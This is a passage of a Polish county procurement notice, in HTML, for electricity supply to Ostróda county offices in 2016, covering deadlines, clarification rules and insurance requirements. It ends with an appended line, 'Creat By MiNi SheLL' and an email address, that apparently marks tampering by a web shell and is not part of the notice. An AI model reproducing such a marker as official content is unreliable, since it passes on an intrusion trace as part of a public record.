<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Ostródzie   14- 100 Ostróda, ul. Jana III Sobieskiego 5, pok.418. Opłata za siwz w wersji papierowej - 0,30 PLN/1 str. formatu A-4 + koszt wysyłki.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.09.2015 godzina 10:00, miejsce: Starostwo Powiatowe w Ostródzie   14- 100 Ostróda, ul. Jana III Sobieskiego 5, pok. 218 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Termin wykonania zamówienia: od dnia 1 stycznia 2016r. do dnia  31 grudnia 2016r.
Dostawa energii elektrycznej do poszczególnych punktów poboru rozpocznie się  od dnia                           1 stycznia 2016r. - nie wcześniej jednak niż z dniem skutecznego rozwiązania dotychczasowych umów sprzedaży energii elektrycznej, a także po pozytywnie przeprowadzonej procedurze zmiany sprzedawcy z właściwym OSD.
2. Postępowanie o udzielenie zamówienia prowadzi się w języku polskim.
3. Oświadczenia, wnioski, zawiadomienia oraz informacje zamawiający i wykonawcy przekazują pisemnie, faksem lub drogą elektroniczną, z zastrzeżeniem wyjątków określonych w ustawie Pzp, dla których bezwzględnie wymagana jest forma pisemna.
4. Jeżeli zamawiający lub wykonawca przekazują oświadczenia, wnioski, zawiadomienia                         oraz informacje faksem lub drogą elektroniczną, każda ze stron na żądanie drugiej niezwłocznie potwierdza fakt ich otrzymania.
5. Wykonawca może zwrócić się do Zamawiającego o wyjaśnienie treści specyfikacji istotnych warunków zamówienia. Zamawiający jest obowiązany udzielić wyjaśnień niezwłocznie, jednak nie później niż na 2 dni przed upływem terminu składania ofert, pod warunkiem że wniosek 
o wyjaśnienie treści specyfikacji istotnych warunków zamówienia wpłynął do Zamawiającego        nie później niż do końca dnia, w którym upływa połowa wyznaczonego terminu składania ofert,               tj. do  21.09.2015r.
6. Jeżeli wniosek o wyjaśnienie treści specyfikacji istotnych warunków zamówienia wpłynął                         po upływie terminu składania wniosków, o którym mowa w ust. 5, lub dotyczy udzielonych wyjaśnień, Zamawiający może udzielić wyjaśnień albo pozostawić wniosek bez rozpatrzenia.
7. Przedłużenie terminu składania ofert nie wpływa na bieg terminu składania wniosku, o którym mowa w ust. 5.
8. Zamawiający jednocześnie przekaże treść zapytań wraz z wyjaśnieniami wszystkim wykonawcom, którym przekazano siwz, bez ujawniania źródła zapytania oraz zamieszcza ich treść na stronie internetowej  http://bip.powiat.ostroda.pl. 
9. W uzasadnionych przypadkach Zamawiający może przed upływem terminu składania ofert zmienić treść siwz. Dokonaną zmianę siwz Zamawiający przekaże niezwłocznie wszystkim wykonawcom, którym przekazano siwz, a jeżeli siwz jest udostępniana na stronie internetowej, zamieści ją także na tej stronie.
10. Jeśli zmiana treści siwz prowadzić będzie do zmiany treści ogłoszenia o zamówieniu Zamawiający zamieści ogłoszenie o zmianie ogłoszenia w Biuletynie Zamówień Publicznych.
11. Wykonawca, którego oferta zostanie uznana za najkorzystniejszą, przed podpisaniem umowy zobowiązany jest:
1) przedstawić Zamawiającemu umowę regulującą współpracę wykonawców wspólnie ubiegających się o udzielenie zamówienia, jeżeli oferta wybrana jako najkorzystniejsza została złożona przez wykonawców wspólnie ubiegających się o udzielenie zamówienia;
2) złożyć oświadczenie, że zawarł umowę dystrybucyjną (tzw. Generalną Umowę Dystrybucyjną z Operatorem Systemy Dystrybucyjnego, tj. Energa Operator), umożliwiającą sprzedaż energii elektrycznej za pośrednictwem sieci dystrybucyjnej OSD do obiektów Zamawiającego w okresie wykonywania zamówienia, podając w oświadczeniu nr przedmiotowej umowy oraz datę jej zawarcia  - dotyczy Wykonawców, którzy złożyli w ofercie oświadczenie, że zawrą taką umowę w przypadku uznania ich oferty za najkorzystniejszą; 
3) przedłożyć - odrębnie dla każdego podmiotu objętego przedmiotem zamówienia, wyszczególnionego § 3 siwz ust. 3 pkt 3.1 i 3.2 - potwierdzoną za zgodność z oryginałem kopię opłaconej, aktualnej polisy ubezpieczenia odpowiedzialności cywilnej kontraktowej                                            w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, wystawionej                        na sumę ubezpieczenia równą minimum wartości kontraktu brutto, którą to wartość stanowi iloczyn ceny jednostkowej netto wynikającej ze złożonej oferty i wielkości zużycia energii elektrycznej ogółem wskazanej w załączniku nr 1 do umowy dla danego podmiotu, powiększony o należny podatek od towarów i usług VAT.
W przypadku przedłożenia, do wszystkich umów zawieranych w wyniku przeprowadzonego postępowania,  jednej (tej samej) polisy, musi być ona wystawiona na sumę ubezpieczeniową równą minimum wartości ceny ofertowej brutto wskazanej w poz. 1 formularza ofertowego (zał. nr 2 do siwz).
12. Zamawiający nie wymaga wniesienia zabezpieczenia należytego wykonania umowy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com